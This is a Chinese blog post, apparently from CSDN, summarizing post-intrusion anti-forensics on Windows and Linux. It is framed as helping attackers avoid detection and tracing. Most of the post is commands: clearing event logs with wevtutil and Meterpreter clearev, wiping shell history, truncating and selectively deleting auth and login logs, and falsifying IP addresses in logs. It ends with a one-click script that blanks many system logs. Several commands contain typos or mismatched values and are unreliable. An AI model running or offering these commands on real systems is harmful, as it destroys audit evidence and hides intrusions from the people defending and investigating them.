后渗透阶段清理痕迹方式总结

最新推荐文章于 2023-09-17 10:37:15 发布
最新推荐文章于 2023-09-17 10:37:15 发布
阅读量764 收藏 10
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_25645753/article/details/114930312
版权

一、前言

在渗透完成之后,为了减少被发现和追溯的概率,攻击者有必要清除自己的攻击痕迹,本文分别对windows和linux上清理痕迹的方式做一个总结。

二、windows

有远程桌面权限时手动删除日志:
开始-程序-管理工具-计算机管理-系统工具-事件查看器-清除日志
wevtutil:

wevtutil el             列出系统中所有日志名称
wevtutil cl system      清理系统日志
wevtutil cl application 清理应用程序日志
wevtutil cl security    清理安全日志

meterperter自带清除日志功能:

clearev     清除windows中的应用程序日志、系统日志、安全日志

清除recent:

在文件资源管理器中点击“查看”->“选项”->在常规->隐私中点击”清除”按钮

或直接打开C:\Users\Administrator\Recent并删除所有内容

或在命令行中输入del /f /s /q “%userprofile%\Recent*.*

三、linux

清除命令历史记录

histroy -r          #删除当前会话历史记录
history -c          #删除内存中的所有命令历史
rm .bash_history   #删除历史文件中的内容
HISTZISE=0          #通过设置历史命令条数来清除所有历史记录
在隐蔽的位置执行命令
使用vim打开文件执行命令

:set history=0
:!command

linux日志文件

/var/run/utmp 记录现在登入的用户
/var/log/wtmp 记录用户所有的登入和登出
/var/log/lastlog 记录每一个用户最后登入时间
/var/log/btmp 记录错误的登入尝试
/var/log/auth.log 需要身份确认的操作
/var/log/secure 记录安全相关的日志信息
/var/log/maillog 记录邮件相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志
/var/log/cron 记录定时任务相关的日志信息
/var/log/spooler 记录UUCP和news设备相关的日志信息
/var/log/boot.log 记录守护进程启动和停止相关的日志消息

完全删除日志文件:

cat /dev/null > filename
: > filename
> filename
echo "" > filename
echo > filename

针对性删除日志文件:

**删除当天日志**
sed  -i '/当天日期/'d  filename

篡改日志文件:

将所有172.16.13.1ip替换为127.0.0.1
sed -i 's/170.170.64.17/127.0.0.1/g'

一键清除脚本:

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c

免责声明:本人坚决反对利用教学方法进行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地进行防护。禁止任何人转载到其他站点,禁止用于任何非法用途。如有任何人凭此做何非法事情,均于笔者无关,特此声明。

蜜罐小明哥
关注
  • 0
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试-后渗透阶段.pdf
02-25
《Metasploit渗透测试魔鬼训练营》读书笔记文档,是在我看书的过程中对书中理论和一些实践的总结
渗透后消除痕迹的方法及实例讲解
白帽子佳奇的博客
12-07 1788
在网络安全领域,渗透后消除痕迹是一个关键的环节。作为一名专业的网络安全从业者,我认识到在成功完成渗透测试后,有效地清除所有痕迹的重要性。很多新手,渗透了忘记擦屁股,最后暴露,如果你刚接触网安,欢迎探讨。
渗透之——Metasploit清除渗透痕迹
冰河的专栏
01-12 3631
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86358579 工具:Metasploit 为了实现这个目的,我们需要通过事件管理器模块清除事件日志。 这里,假设经过一系列的渗透测试已经获取了system权限的meterpreter,以下命令在meterpreter命令行下执行: 1.查看事件日志 run event...
Kali Linux渗透测试 049 清除痕迹
kevinhanser
03-04 4752
本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程 1. 清除渗透攻击痕迹
wevtutil简介与使用
VinWqx的博客
02-21 2024
wevtutil是微软Windows eventlog有关的工具,可以用于检索有关事件日志、导出、清除、归档事件日志等。
linux后渗透痕迹清除
The current road is different, love needs to distinguish between right and wrong
11-20 3697
历史记录清除 Bash、shell、终端将当前会话中使用的命令列表保存在内存中,因此必须对其进行清理。 history用于命令查看当前历史记录。 环境变量:HISTFILE 查找history命令文件存储路径: echo $HISTFILE #返回当前用户history命令存储文件路径 删除变量: unset HISTFILE 这时候在使用一次"echo HISTFILE"将返回为空。 为了防止历史命令被保存,也可以将其发送到/dev/null HISTFILE=...
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用与提权》,但...
渗透阶段的攻防对抗.pdf
08-15
渗透阶段的攻防对抗 下一代
渗透测试常用术语的总结
最新发布
03-07
自己在学习渗透测试过程中对于渗透测试过程中的一些常用术语
内网渗透系列:痕迹清理方法小结
闵行小鱼塘
08-05 3501
本文学习并小结下痕迹清理方法
红队渗透-window痕迹清除
EdisonJH的博客
05-16 2085
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、windows操作系统基础入门二、windows渗透痕迹清除1.为避免入侵操作行为被发现时,攻击者往往通过各种方式来隐藏自己操作痕迹,比如:删除日志、隐藏后门、日志伪造。 前言 我们在做痕迹清理时,一定要对windows的基础理论,基础知识点明确于心,废话不多说,接下来开始学习。 记录MS08068学习红队三期windows痕迹清除 1、windows用户基础入门 2、windows用户命令入门 3、windows渗透痕.
渗透-痕迹清理
qq_44657899的博客
11-12 776
修改文件时间戳 有时我们登陆到服务器,对它的⽂件进行了修改,修改后的⽂件的时间戳会更新到最新的 时间,那么这样就会引起管理员的注意。 因此我们需要吧那个⽂件的时间戳给修改成其他时间! Powershell命令 $(DATE) 表示当前日期和时间; $(Get-Date) 同$(DATE),表示当前日期和时间; $(Get-Date "MM/DD/YYYY HH24:MI:SS") 表示指定的日期和时间; $(Get-Item abc.txt) 表示获取文件的句柄; $(Get-Item abc.txt).c
内网渗透-Windows&Linux痕迹清除
lza20001103的博客
09-26 5834
Windows&Linux痕迹清除 文章目录Windows&Linux痕迹清除前言Windows痕迹清除Windows日志清理meterpreter清理日志Linux痕迹清除后记 前言 当我们进行内网一系列的渗透之后,就会留下一些命令的痕迹,我们离开的时候,为了防止管理员发现,我们就需要进行内网渗透最后一个环节的内容了,就是进行痕迹清除。命令有点多,大家好好做一下笔记吧。 Windows痕迹清除 Windows日志 如何查看: 事件查看器->windows日志 win+r eventv
记一次简单的域渗透-从Web站点上线不出网内网主机-痕迹清理
weixin_45965246的博客
09-17 417
配置信息DC IP:10.10.10.10 OS:Windows 2012(64) 应用:AD域web IP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008(64) 应用:Weblogin 10.3.6 MSSQL 2008PC IP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7(32) 应用:攻击机 IP:192.168.111.1 OS:Windows 10(64) IP:192.168.111.5 OS:K
渗透测试——痕迹清除
zjdda的博客
07-11 1778
当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的!
渗透测试之痕迹清除
qq_29864185的博客
07-01 3244
痕迹清除 当我们达到了目的之后,有时候只是为了黑入网站挂黑页,炫耀一下;或者在网站留下一个后门,作为肉鸡,没事的时候上去溜达溜达;亦或者挂入挖矿木马;但是大家千万不要干这些事,这些都是违法的! 我这里只是教大家在渗透进去之后如何清除我们留下的一部分痕迹,并不能完全清除,完全清除入侵痕迹是不可能的!主要是增加管理员发现入侵者的时间成本和人力成本。只要管理员想查,无论你怎么清除,还是能查到的。 最主要还是要以隐藏自身身份为主,最好的手段是在渗透前挂上代理,然后在渗透痕迹清除。 Windows系统
3.4 Linux系统日志的清除
qq_55202378的博客
07-20 5079
日志清除
清空/var/adm/wtmp 文件内容
weixin_34221073的博客
09-15 677
清/var/adm/wtmp 文件内容 用于显示登录系统和重启机器的情况 /var/adm/wtmp文件过大。 可用du -sm /var/adm/wtmp查看 cat /dev/null>/var/adm/wtmp 转载于:https://www.cnblogs.com/liang545621/p/7528699.html...
AIX和Linux中wtmp的不同处理方式
JellyLv的专栏
09-22 3568
wtmp 记录用户登录和退出事件.它和utmp日志文件相似,但它随着登陆次数的增加,它会变的越来越大,有些系统的ftp访问也在这个文件里记录,同时它也记录正常的系统退出时间,可以用ac和last命令访问. 1、它不会随着信息的增多而自动减少。 2、它有可能根据不同系统的默认设置,会有对应的保存周期。 3、它可以用last来查看记录 Aix:    last -f /var/adm/wtmp
.在后渗透阶段完成后,需要清楚所有的操作痕迹,清楚痕迹的命令是
06-10
渗透阶段完成后,为了避免被检测和追踪,需要清除所有的操作痕迹。清除痕迹可以使用以下命令: ``` meterpreter > clearev ``` 该命令可以清除所有事件日志,包括系统日志、安全日志和应用程序日志等。需要注意的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值